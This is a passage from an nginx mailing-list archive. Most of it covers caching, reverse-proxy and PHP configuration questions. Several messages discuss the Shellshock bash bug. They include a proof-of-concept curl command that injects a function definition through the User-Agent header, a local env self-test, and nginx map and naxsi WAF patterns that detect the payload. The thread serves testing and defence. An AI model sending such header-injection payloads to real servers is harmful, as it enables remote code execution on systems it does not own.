<6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> Message-ID: <88FE1279903F4E289BB35A478ED09E00@MasterPC> > @RR. could you guide me a bit on it or point me to some guide to start > with. I have worked with varnish regarding php caching so i have the basic > knowledge of varnish but i am just not getting on how to make it work with > proxy_store. :( Depending on your needs (for example SSL) you can put varnish in different places in the setup: If you use SSL (which varnish itself doesn't support) you can use your proxy_store server as an SSL offloader: 1. [client] <- -> [nginx proxy_store server] <- -> [varnish] <- -> [content_server] .. in this case when multiple requests land onto nginx proxy_store in case the file locally doesnt exist those are forwarded to varnish and combined into a single request to the content server. A simplistic/generic nginx config: location / { error_page 404 = @store; } location @store { internal; proxy_pass http://imgstore;; proxy_store on; } varnish config: backend default { .host = "content_server.ip"; } sub vcl_recv { set req.backend = default; } Obviously add whatever else you need (like forwarded-for headers to pass the real client ip, cache expire times etc). 2. In case you don't use SSL: [client] <- -> [varnish] <- -> [content_server] (optionally you put nginx or some other software like stud or pound on top of varnish as SSL offloader (personally I use Shrpx from Spdylay ( https://github.com/tatsuhiro-t/spdylay )) Then generic varnish config would look bassically the same: backend default { .host = "content_server.ip"; } sub vcl_recv { set req.backend = default; } sub vcl_backend_response { set beresp.do_stream = true; } Hope that helps. rr From shahzaib.cb at gmail.com Wed Sep 24 13:55:00 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 24 Sep 2014 18:55:00 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <88FE1279903F4E289BB35A478ED09E00@MasterPC> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> Message-ID: @RR, That's great. Sure it will help me. I am starting to work with it on local environment and will get back to you once the progress started :) Thanks a lot for writing sample config for me !! On Wed, Sep 24, 2014 at 6:32 PM, Reinis Rozitis wrote: > @RR. could you guide me a bit on it or point me to some guide to start >> with. I have worked with varnish regarding php caching so i have the basic >> knowledge of varnish but i am just not getting on how to make it work with >> proxy_store. :( >> > > Depending on your needs (for example SSL) you can put varnish in different > places in the setup: > > > If you use SSL (which varnish itself doesn't support) you can use your > proxy_store server as an SSL offloader: > > 1. [client] <- -> [nginx proxy_store server] <- -> [varnish] <- -> > [content_server] > > .. in this case when multiple requests land onto nginx proxy_store in case > the file locally doesnt exist those are forwarded to varnish and combined > into a single request to the content server. > > A simplistic/generic nginx config: > > location / { > error_page 404 = @store; > } > > location @store { > internal; > proxy_pass http://imgstore;; > proxy_store on; > } > > > varnish config: > > backend default { > .host = "content_server.ip"; > } > sub vcl_recv { > set req.backend = default; > } > > > Obviously add whatever else you need (like forwarded-for headers to pass > the real client ip, cache expire times etc). > > > > 2. In case you don't use SSL: > > [client] <- -> [varnish] <- -> [content_server] > (optionally you put nginx or some other software like stud or pound on top > of varnish as SSL offloader (personally I use Shrpx from Spdylay ( > https://github.com/tatsuhiro-t/spdylay )) > > Then generic varnish config would look bassically the same: > > backend default { > .host = "content_server.ip"; > } > sub vcl_recv { > set req.backend = default; > } > > sub vcl_backend_response { > set beresp.do_stream = true; > } > > > > Hope that helps. > > > rr > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Sep 24 23:53:16 2014 From: nginx-forum at nginx.us (mex) Date: Wed, 24 Sep 2014 19:53:16 -0400 Subject: CVE-2014-6271 : Remote code execution through bash Message-ID: hi list, the following bug (Remote code execution through bash) http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ **might** affect you if you use a shell/bash - based fcgi-wrapper like in the following receipt: http://wiki.nginx.org/Fcgiwrap / http://wiki.nginx.org/FcgiwrapDebianInitScript (did not tested it); if someone runs a shell-based cgi-wrapper and would like to test the POC from reddit, i'd be interested in the result :D curl -v -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa' http://example.com/path/to/file at least i can confirm this affects bash-based CGIs. ssh-based gitolite/gitlab et al are affected too. local self-test: # Output, wenn vulnerable: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test # Output, wenn not vulnerable: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test additional references: Advisory CVE-2014-6271: remote code execution through bash (oss-sec-ml) http://seclists.org/oss-sec/2014/q3/649 Analysis 1 oss-sec ml http://seclists.org/oss-sec/2014/q3/650 Analysis 2 / RedHat https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Naxsi-WAF Signatures http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html regards & happy patching (and sorry for this slightly OT-post) mex Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253532,253532#msg-253532 From nginx-forum at nginx.us Thu Sep 25 04:49:25 2014 From: nginx-forum at nginx.us (hagarwal502) Date: Thu, 25 Sep 2014 00:49:25 -0400 Subject: Alternate POST request to nginx failing In-Reply-To: <38207e4eb3e3c93b34f76e4886f90df5.NginxMailingListEnglish@forum.nginx.org> References: <38207e4eb3e3c93b34f76e4886f90df5.NginxMailingListEnglish@forum.nginx.org> Message-ID: <00555fd122235f2dce19fad057df2a32.NginxMailingListEnglish@forum.nginx.org> Just a addition. I'm using Nginx Version 1.7.4. Also strangely if I use unix/wget to make the same POST request the issue doesn't appear. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253507,253535#msg-253535 From lists at ruby-forum.com Thu Sep 25 04:50:50 2014 From: lists at ruby-forum.com (Andrew Cantino) Date: Thu, 25 Sep 2014 06:50:50 +0200 Subject: CVE-2014-6271 : Remote code execution through bash In-Reply-To: References: Message-ID: <47e74d51e11e6edba6e78554b30097f2@ruby-forum.com> This could also be abused if you ever add any ENV variables that can come from a user. https://gist.github.com/cantino/9fe5f338e5027a46e2eb -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Thu Sep 25 07:27:19 2014 From: nginx-forum at nginx.us (mex) Date: Thu, 25 Sep 2014 03:27:19 -0400 Subject: CVE-2014-6271 : Remote code execution through bash In-Reply-To: References: Message-ID: <9d5c49bd4abcc49238b1006b4c2abac5.NginxMailingListEnglish@forum.nginx.org> foo ... http://www.openwall.com/lists/oss-security/2014/09/24/17 "Note that on Linux systems where /bin/sh is symlinked to /bin/bash, any popen() / system() calls from within languages such as PHP would be of concern due to the ability to control HTTP_* in the env. /mz" $ ls -la /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash phew ':) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253532,253537#msg-253537 From shahzaib.cb at gmail.com Thu Sep 25 14:13:44 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 25 Sep 2014 19:13:44 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> Message-ID: @RR, i've prepared the local environment with the following structure :- client --> nginx (edge) --> varnish --> backend (Origin) When i tested this method i.e :- 3 clients requested for test.mp4 (file size is 4mb) --> nginx --> file not existed (proxy_store) --> varnish --> backend (fetch the file from origin). When nginx proxied these three requests subsequently towards the varnish,, despite of filling 4mb of tmp dir it was filled with 12MB which means nginx is proxying all three requests towards the varnish server and creating tmp files as long as the file is not downloaded. (The method was failed) Although On putting varnish in front of nginx solved this issue. 3 clients requested for test.mp4(file size is 4mb) --> varnish(proxying all requests for mp4,jpg) --> nginx.(fetch the file from origin). This time tmp dir was filled with the size of 4Mb which means varnish combined those 3 subsequent requests into 1. -------------------------------------------------------------------------------------------------------------------------- Now varnish also has a flaw to send subsequent requests for same file towards the nginx i.e 1st user requested for file http://edge.files.com/videos/test.mp4. During the downloading of first requested file, the second user also requested the same file but with random seeking http://edge.files.com/videos/test.mp4?start=33 . Now as the request uri is changed, there are two different requests for the same file in varnish and again nginx tmp directory was filled with 8MB instead of 4 which means nginx downloaded the full file twice. So Random seeking will only work once the file is cached locally, otherwise nginx will keep on creating tmp files against random seekings. I have two questions now :- 1. If there's way to prevent duplicate downloads for random seekings while the file not downloaded yet ? Note :- We cannot disable mp4 module. 2. Should nginx in front of varnish never work as expected or i am doing something wrong ? Following are existing varnish in front of nginx configs. Please let me know if something need to be fixed :- varnish config :- backend origin002 { .host = "127.0.0.1"; .port = "8080"; } backend origin003 { .host = "127.0.0.1"; .port = "8080"; } sub vcl_recv { if ( req.http.host == "origin002.files.com" ){ set req.backend_hint = origin002; } elsif ( req.http.host == "origin003.files.com" ){ set req.backend_hint = origin003; } elsif ( req.http.host == "origin004.files.com" ){ set req.backend_hint = origin004; } } sub vcl_backend_response { if (bereq.url ~ "^[^?]*\.(mp4|jpeg|jpg)(\?.*)?$"){ set beresp.do_stream = true; return (deliver); } set beresp.grace = 1m; return (deliver); } sub vcl_deliver { } ----------------------------------------------------------------------------------------- Nginx config :- server { listen 127.0.0.1:8080; server_name origin002.files.com; root /var/www/html/tunefiles; location ~ \.(mp4|jpeg|jpg)$ { root /var/www/html/tunefiles; mp4; error_page 404 = @fetch; } location ~ \.(php)$ { proxy_pass http://origin002.files.com:80; } location @fetch { internal; proxy_max_temp_file_size 0; proxy_pass http://content.files.com:80$uri; proxy_store on; proxy_store_access user:rw group:rw all:r; root /var/www/html/tunefiles; } } I can also send the configs which were configured for nginx in front of varnish (which didn't resolved my issue). BTW, i am using malloc storage instead of file in varnish. Thanks !! On Wed, Sep 24, 2014 at 6:55 PM, shahzaib shahzaib wrote: > @RR, That's great. Sure it will help me. I am starting to work with it on > local environment and will get back to you once the progress started :) > > Thanks a lot for writing sample config for me !! > > On Wed, Sep 24, 2014 at 6:32 PM, Reinis Rozitis wrote: > >> @RR. could you guide me a bit on it or point me to some guide to start >>> with. I have worked with varnish regarding php caching so i have the basic >>> knowledge of varnish but i am just not getting on how to make it work with >>> proxy_store. :( >>> >> >> Depending on your needs (for example SSL) you can put varnish in >> different places in the setup: >> >> >> If you use SSL (which varnish itself doesn't support) you can use your >> proxy_store server as an SSL offloader: >> >> 1. [client] <- -> [nginx proxy_store server] <- -> [varnish] <- -> >> [content_server] >> >> .. in this case when multiple requests land onto nginx proxy_store in >> case the file locally doesnt exist those are forwarded to varnish and >> combined into a single request to the content server. >> >> A simplistic/generic nginx config: >> >> location / { >> error_page 404 = @store; >> } >> >> location @store { >> internal; >> proxy_pass http://imgstore;; >> proxy_store on; >> } >> >> >> varnish config: >> >> backend default { >> .host = "content_server.ip"; >> } >> sub vcl_recv { >> set req.backend = default; >> } >> >> >> Obviously add whatever else you need (like forwarded-for headers to pass >> the real client ip, cache expire times etc). >> >> >> >> 2. In case you don't use SSL: >> >> [client] <- -> [varnish] <- -> [content_server] >> (optionally you put nginx or some other software like stud or pound on >> top of varnish as SSL offloader (personally I use Shrpx from Spdylay ( >> https://github.com/tatsuhiro-t/spdylay )) >> >> Then generic varnish config would look bassically the same: >> >> backend default { >> .host = "content_server.ip"; >> } >> sub vcl_recv { >> set req.backend = default; >> } >> >> sub vcl_backend_response { >> set beresp.do_stream = true; >> } >> >> >> >> Hope that helps. >> >> >> rr >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Thu Sep 25 14:39:12 2014 From: r at roze.lv (Reinis Rozitis) Date: Thu, 25 Sep 2014 17:39:12 +0300 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> Message-ID: <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> > 3 clients requested for test.mp4 (file size is 4mb) --> nginx --> file not > existed (proxy_store) --> varnish --> backend (fetch the file from > origin). > When nginx proxied these three requests subsequently towards the varnish,, > despite of filling 4mb of tmp dir it was filled with 12MB which means > nginx is proxying all three requests towards the varnish server and > creating tmp files as long as the file is not downloaded. (The method was > failed) That is expected, this setup only ?guards? the content server. > Now varnish also has a flaw to send subsequent requests for same file > towards the nginx i.e It's not a really flaw but default behaviour (different urls mean different content/cachable objects), but of course you can implement your own scenario: By adding: sub vcl_recv { set req.url = regsub(req.url, "\?.*", ""); } will remove all the the arguments behind ? from the uri when forwarding to the content backend. For static content I usually also add something like: unset req.http.Cookie; unset req.http.Accept-Encoding; unset req.http.Cache-Control; to normalise the request and so varnish doesnt try to cache different versions of the same object. If you insist on using proxy_store I would probably also add proxy_ignore_client_abort on; ( http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_ignore_client_abort ) to the nginx configuration. So the requests don't get repeated if the client closes/aborts the request early etc. rr From aflexzor at gmail.com Thu Sep 25 18:05:30 2014 From: aflexzor at gmail.com (Alex Flex) Date: Thu, 25 Sep 2014 12:05:30 -0600 Subject: prepend a php script in all requests Message-ID: <5424596A.4060708@gmail.com> Hey guys, Once i have nginx installed with php fastcgi. Is it possible to preppend a php script to be executed when serving any request? (similar to apache prepend function). If yes could I please have an example. Thanks Alex From shahzaib.cb at gmail.com Thu Sep 25 18:42:52 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 25 Sep 2014 23:42:52 +0500 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: @RR, thanks a lot for the explanation and examples. It really helped me :) >>set req.url = regsub(req.url, "\?.*", ""); It will also prevent users seeking the video because the arguments after "?" will remove whenever user will try to seek the video stream, isn't it ? >>unset req.http.Cookie; unset req.http.Accept-Encoding; unset req.http.Cache-Control; I'll apply it right at the top of vcl_recv. >>If you insist on using proxy_store I would probably also add proxy_ignore_client_abort on; Well, only proxy_store is able to fulfill my requirements that is the reason i'll have to stick with it. I am bit confused about the varnish. Actually, i don't need any kind of caching within the varnish as nginx already doing it via proxy_store. I just need varnish to merge the subsequent requests into 1 and forward it to nginx and i think varnish is doing it pretty well . Nevertheless, i am confused if malloc caching will have any odd effect on the stream behavior ? Following is the curl request for video file on caching server and Age parameter is also there :- curl -I http://edge.files.com/files/videos/2014/09/23/1411461292920e4-720.mp4 HTTP/1.1 200 OK Date: Thu, 25 Sep 2014 18:26:24 GMT Content-Type: video/mp4 Last-Modified: Tue, 23 Sep 2014 08:36:11 GMT ETag: "542130fb-5cd4456" Age: 5 Content-Length: 97338454 Connection: keep-alive Thanks !! Shahzaib On Thu, Sep 25, 2014 at 7:39 PM, Reinis Rozitis wrote: > 3 clients requested for test.mp4 (file size is 4mb) --> nginx --> file not >> existed (proxy_store) --> varnish --> backend (fetch the file from origin). >> When nginx proxied these three requests subsequently towards the >> varnish,, despite of filling 4mb of tmp dir it was filled with 12MB which >> means nginx is proxying all three requests towards the varnish server and >> creating tmp files as long as the file is not downloaded. (The method was >> failed) >> > > That is expected, this setup only ?guards? the content server. > > > > Now varnish also has a flaw to send subsequent requests for same file >> towards the nginx i.e >> > > It's not a really flaw but default behaviour (different urls mean > different content/cachable objects), but of course you can implement your > own scenario: > > > By adding: > > sub vcl_recv { > set req.url = regsub(req.url, "\?.*", ""); > } > > will remove all the the arguments behind ? from the uri when forwarding to > the content backend. > > > For static content I usually also add something like: > > unset req.http.Cookie; > unset req.http.Accept-Encoding; > unset req.http.Cache-Control; > > to normalise the request and so varnish doesnt try to cache different > versions of the same object. > > > If you insist on using proxy_store I would probably also add > proxy_ignore_client_abort on; ( http://nginx.org/en/docs/http/ > ngx_http_proxy_module.html#proxy_ignore_client_abort ) to the nginx > configuration. So the requests don't get repeated if the client > closes/aborts the request early etc. > > > rr > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From thunderhill4 at gmail.com Thu Sep 25 19:50:18 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Fri, 26 Sep 2014 01:20:18 +0530 Subject: Rewriting location directive by upstream servers Message-ID: Hi, I have two back end application servers behind nginx. The configuration is as follows upstream backend1 { server 10.1.1.11; } upstream backend2 { server 10.2.2.2; } server { listen 80; server_name mysite.com; location /appl1 { # proxy_set_header X-Real-IP $remote_addr; proxy_pass https://backend1/; } location /app2 { proxy_pass https://backend2/; } } When I access mysite.com/app1 the upstream server rewrites the url like mysite.com/login instead of mysite.com/app1/login and the result is a blank page. Users are allowed either mysite.com/app1 or mysite.com/app2. In both the cases app1 and app2 are getting rewritten with login or some other extension. How to solve this issue.? Regards T -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Thu Sep 25 21:05:52 2014 From: francis at daoine.org (Francis Daly) Date: Thu, 25 Sep 2014 22:05:52 +0100 Subject: Rewriting location directive by upstream servers In-Reply-To: References: Message-ID: <20140925210552.GP3771@daoine.org> On Fri, Sep 26, 2014 at 01:20:18AM +0530, thunder hill wrote: Hi there, > When I access mysite.com/app1 the upstream server rewrites the url like > mysite.com/login instead of mysite.com/app1/login and the result is a > blank page. > > Users are allowed either mysite.com/app1 or mysite.com/app2. In both the > cases app1 and app2 are getting rewritten with login or some other > extension. How to solve this issue.? I believe that the easiest way, if you want both to be available via the same hostname, is to install-or-configure app1 on backend1 to be available below the url /app1/, not below /. And do something similar for app2. And then remove the final "/" in your proxy_pass directives. f -- Francis Daly francis at daoine.org From francis at daoine.org Thu Sep 25 21:28:46 2014 From: francis at daoine.org (Francis Daly) Date: Thu, 25 Sep 2014 22:28:46 +0100 Subject: prepend a php script in all requests In-Reply-To: <5424596A.4060708@gmail.com> References: <5424596A.4060708@gmail.com> Message-ID: <20140925212846.GQ3771@daoine.org> On Thu, Sep 25, 2014 at 12:05:30PM -0600, Alex Flex wrote: Hi there, > Once i have nginx installed with php fastcgi. Is it possible to > preppend a php script to be executed when serving any request? > (similar to apache prepend function). That sounds like it should be a feature of your fastcgi server or your php runtime, rather than nginx. I suggest searching for "fastcgi prepend" or "php prepend" in your favourite search engine. f -- Francis Daly francis at daoine.org From r at roze.lv Thu Sep 25 21:36:51 2014 From: r at roze.lv (Reinis Rozitis) Date: Fri, 26 Sep 2014 00:36:51 +0300 Subject: Forward single request to upstream server via proxy_store !! In-Reply-To: References: <6086928.qVWrtWDE0h@vbart-workstation> <2135119.tXnJ49yO9u@vbart-workstation> <69F098B4B0F245CAB8D9220D175265F7@NeiRoze> <88FE1279903F4E289BB35A478ED09E00@MasterPC> <2AF8FA56EC1A4E1D91D9145390D0AB4E@MasterPC> Message-ID: > It will also prevent users seeking the video because the arguments after > "?" will remove whenever user will try to seek the video stream, isn't it > ? In general it shouldn?t since the ??start=? is handled by nginx and not varnish, but I?m not exactly sure how the mp4 module of nginx handles a proxied request. You have to test it. In worst case scenario imho only the first request (before landing on the proxy_store server) will ?fail? eg play from the beginning instead of the time set. > Well, only proxy_store is able to fulfill my requirements that is the > reason i'll have to stick with it. Well you can try to use varnish as the streamer, just need some (web)player supporting byte-range requests for the seeking ( http://flash.flowplayer.org/plugins/streaming/pseudostreaming.html ). > I am bit confused about the varnish. Actually, i don't need any kind of > caching within the varnish as nginx already doing it via proxy_store. I > just need varnish to merge the subsequent requests into 1 and forward it > to nginx and i think varnish is doing it pretty well. Nevertheless, i am > confused if malloc caching will have any odd effect on the stream behavior > ? You can try to pass the request without caching: sub vcl_fetch { return (pass); } (maybe even do it in the vcl_recv stage but again I'm not exactly sure if in that case the request coalescing works). rr From r at roze.lv Thu Sep 25 21:44:47 2014 From: r at roze.lv (Reinis Rozitis) Date: Fri, 26 Sep 2014 00:44:47 +0300 Subject: prepend a php script in all requests In-Reply-To: <5424596A.4060708@gmail.com> References: <5424596A.4060708@gmail.com> Message-ID: > Once i have nginx installed with php fastcgi. Is it possible to preppend a > php script to be executed when serving any request? (similar to apache > prepend function). If yes could I please have an example. Thanks PHP itself has such functionality http://php.net/manual/en/ini.core.php#ini.auto-prepend-file . If you want to change it from nginx you can add following line to your particular php/fastcgi block: fastcgi_param PHP_VALUE "auto_prepend_file=/path/to/your/file.php"; rr From thunderhill4 at gmail.com Fri Sep 26 04:42:47 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Fri, 26 Sep 2014 10:12:47 +0530 Subject: Rewriting location directive by upstream servers In-Reply-To: <20140925210552.GP3771@daoine.org> References: <20140925210552.GP3771@daoine.org> Message-ID: Hi, On Fri, Sep 26, 2014 at 2:35 AM, Francis Daly wrote: > On Fri, Sep 26, 2014 at 01:20:18AM +0530, thunder hill wrote: > > Hi there, > > > When I access mysite.com/app1 the upstream server rewrites the url like > > mysite.com/login instead of mysite.com/app1/login and the result is a > > blank page. > > > > Users are allowed either mysite.com/app1 or mysite.com/app2. In both the > > cases app1 and app2 are getting rewritten with login or some other > > extension. How to solve this issue.? > > I believe that the easiest way, if you want both to be available via > the same hostname, is to install-or-configure app1 on backend1 to be > available below the url /app1/, not below /. > > And do something similar for app2. > > And then remove the final "/" in your proxy_pass directives. > Thats the easiest way. Unfortunately there is no control over backend server(s). Just a thought: Is there a way to keep the url mysite.com/app1 and go on with mysite.com/app1/login. That means backend server can only rewrite the strings after mysite.com/app1 Or are there any other ways? Regards T -------------- next part -------------- An HTML attachment was scrubbed... URL: From zhangqiang.buaa at gmail.com Fri Sep 26 07:45:40 2014 From: zhangqiang.buaa at gmail.com (Zhang Qiang) Date: Fri, 26 Sep 2014 15:45:40 +0800 Subject: Nginx run into Stat D Message-ID: Hi community, We are using Nginx as static http server to cache/send static smal file. The average file size is about 10k ~ 200k -, and nginx server can process ~10000 request per second. It runs well but some times most of nginx worker go into Stat D. and there's no way to kill them but restart system. Here's the call stack for kernel/user space: With AIO enabled -----Kernel Space Call Stack----- 0xffffffff8111f700 : sync_page+0x0/0x50 [kernel] 0xffffffff8111f75e : sync_page_killable+0xe/0x40 [kernel] 0xffffffff81529e7a : __wait_on_bit_lock+0x5a/0xc0 [kernel] 0xffffffff8111f667 : __lock_page_killable+0x67/0x70 [kernel] 0xffffffff81121394 : generic_file_aio_read+0x4b4/0x700 [kernel] 0xffffffff811d58d4 : aio_rw_vect_retry+0x84/0x200 [kernel] 0xffffffff811d7294 : aio_run_iocb+0x64/0x170 [kernel] 0xffffffff811d86c1 : do_io_submit+0x291/0x920 [kernel] 0xffffffff811d8d60 : sys_io_submit+0x10/0x20 [kernel] 0xffffffff8100b288 : tracesys+0xd9/0xde [kernel] -----User Space Call Stack----- 0x3c362e50c9 : syscall+0x19/0x40 [/lib64/libc-2.12.so] 0x4d2232 : ngx_linux_sendfile_chain+0xc2a/0xc2c [/opt/soft/nginx/sbin/nginx] 0x4d24ea : ngx_file_aio_read+0x2b6/0x528 [/opt/soft/nginx/sbin/nginx] 0x515247 : ngx_http_file_cache_open+0xbef/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514df6 : ngx_http_file_cache_open+0x79e/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514abb : ngx_http_file_cache_open+0x463/0x1437 [/opt/soft/nginx/sbin/nginx] 0x5033d0 : ngx_http_upstream_init+0xbc5/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x502916 : ngx_http_upstream_init+0x10b/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x5028ad : ngx_http_upstream_init+0xa2/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x4f8313 : ngx_http_read_client_request_body+0x117/0xd1c [/opt/soft/nginx/sbin/nginx] 0x5351da : ngx_http_ssi_map_uri_to_path+0x1aff0/0x3a5e0 [/opt/soft/nginx/sbin/nginx] 0x4df55b : ngx_http_core_content_phase+0x41/0x1c9 [/opt/soft/nginx/sbin/nginx] 0x4de484 : ngx_http_core_run_phases+0x87/0xc2 [/opt/soft/nginx/sbin/nginx] 0x4de3fb : ngx_http_handler+0x1c3/0x1c5 [/opt/soft/nginx/sbin/nginx] 0x4ec468 : ngx_http_process_request+0x304/0xa98 [/opt/soft/nginx/sbin/nginx] 0x4eaed8 : ngx_http_process_request_uri+0x95e/0x1876 [/opt/soft/nginx/sbin/nginx] 0x4ea414 : ngx_http_ssl_servername+0x6d5/0x83b [/opt/soft/nginx/sbin/nginx] 0x4e94ea : ngx_http_init_connection+0x785/0x78f [/opt/soft/nginx/sbin/nginx] 0x4d11b3 : ngx_os_specific_status+0xe55/0x12aa [/opt/soft/nginx/sbin/nginx] 0x4c3e5a : ngx_process_events_and_timers+0xd6/0x165 [/opt/soft/nginx/sbin/nginx] Without AIO enabled: -----Kernel Space Call Stack----- 0xffffffff8111f700 : sync_page+0x0/0x50 [kernel] 0xffffffff8111f75e : sync_page_killable+0xe/0x40 [kernel] 0xffffffff81529e7a : __wait_on_bit_lock+0x5a/0xc0 [kernel] 0xffffffff8111f667 : __lock_page_killable+0x67/0x70 [kernel] 0xffffffff81121394 : generic_file_aio_read+0x4b4/0x700 [kernel] 0xffffffff81188c8a : do_sync_read+0xfa/0x140 [kernel] 0xffffffff81189645 : vfs_read+0xb5/0x1a0 [kernel] 0xffffffff81189972 : sys_pread64+0x82/0xa0 [kernel] 0xffffffff8100b288 : tracesys+0xd9/0xde [kernel] -----User Space Call Stack----- 0x3c36e0f043 : __pread_nocancel+0xa/0x67 [/lib64/libpthread-2.12.so] 0x4c9ab1 : ngx_read_file+0x35/0xb9 [/opt/soft/nginx/sbin/nginx] 0x5152e9 : ngx_http_file_cache_open+0xc91/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514df6 : ngx_http_file_cache_open+0x79e/0x1437 [/opt/soft/nginx/sbin/nginx] 0x514abb : ngx_http_file_cache_open+0x463/0x1437 [/opt/soft/nginx/sbin/nginx] 0x5033d0 : ngx_http_upstream_init+0xbc5/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x502916 : ngx_http_upstream_init+0x10b/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x5028ad : ngx_http_upstream_init+0xa2/0x7eb4 [/opt/soft/nginx/sbin/nginx] 0x4f8313 : ngx_http_read_client_request_body+0x117/0xd1c [/opt/soft/nginx/sbin/nginx] 0x5351da : ngx_http_ssi_map_uri_to_path+0x1aff0/0x3a5e0 [/opt/soft/nginx/sbin/nginx] 0x4df55b : ngx_http_core_content_phase+0x41/0x1c9 [/opt/soft/nginx/sbin/nginx] 0x4de484 : ngx_http_core_run_phases+0x87/0xc2 [/opt/soft/nginx/sbin/nginx] 0x4de3fb : ngx_http_handler+0x1c3/0x1c5 [/opt/soft/nginx/sbin/nginx] 0x4ec468 : ngx_http_process_request+0x304/0xa98 [/opt/soft/nginx/sbin/nginx] 0x4eaed8 : ngx_http_process_request_uri+0x95e/0x1876 [/opt/soft/nginx/sbin/nginx] 0x4ea414 : ngx_http_ssl_servername+0x6d5/0x83b [/opt/soft/nginx/sbin/nginx] 0x4e94ea : ngx_http_init_connection+0x785/0x78f [/opt/soft/nginx/sbin/nginx] 0x4d11b3 : ngx_os_specific_status+0xe55/0x12aa [/opt/soft/nginx/sbin/nginx] 0x4c3e5a : ngx_process_events_and_timers+0xd6/0x165 [/opt/soft/nginx/sbin/nginx] 0x4cf1a3 : ngx_single_process_cycle+0x1053/0x2114 [/opt/soft/nginx/sbin/nginx] Is anyone see these issue (pending on Stat D) before? how can I resolve it? it seems that not the kernel issue. I have done some basic statistics in 3 seconds: Kernel function: call times sync_page: 91 sync_buffer:2 generic_file_aio_read: 3240 sys_read: 3240 sys_write: 698 Thanks Qiang -------------- next part -------------- An HTML attachment was scrubbed... URL: From Pekka.Panula at sofor.fi Fri Sep 26 08:01:08 2014 From: Pekka.Panula at sofor.fi (Pekka.Panula at sofor.fi) Date: Fri, 26 Sep 2014 11:01:08 +0300 Subject: Shellshock protection using nginx ? Message-ID: Hi I have seen eg. Netscaler response policy which can detect if someone is trying shellshock bug using http headers. I am using nginx as reverse proxy so is there good way to make a similar protection using nginx features? eg. checking http headers and drop/return 404 if shellshock code is detected? Regards, Pekka Panula -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Sep 26 09:14:40 2014 From: nginx-forum at nginx.us (itpp2012) Date: Fri, 26 Sep 2014 05:14:40 -0400 Subject: Shellshock protection using nginx ? In-Reply-To: References: Message-ID: Untested but should work; between http {} map $request $shellshockblock { default 0; ~*\:\; 1; ~*ping 1; ~*\/bash 1; } inside location {} if ($shellshockblock) { return 412; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253553,253554#msg-253554 From nginx-forum at nginx.us Fri Sep 26 09:16:02 2014 From: nginx-forum at nginx.us (mex) Date: Fri, 26 Sep 2014 05:16:02 -0400 Subject: Shellshock protection using nginx ? In-Reply-To: References: Message-ID: hi pekka, since the attack, esp. against CGI, is possible through (custom) headers/cookies etc you'd need some waf-functionalities (afaik) naxsi, an nginx-based waf, has a signature for this since wednesday MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz:BODY|HEADERS" "s:$ATTACK:8" id:42000393 ; http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html Posted at 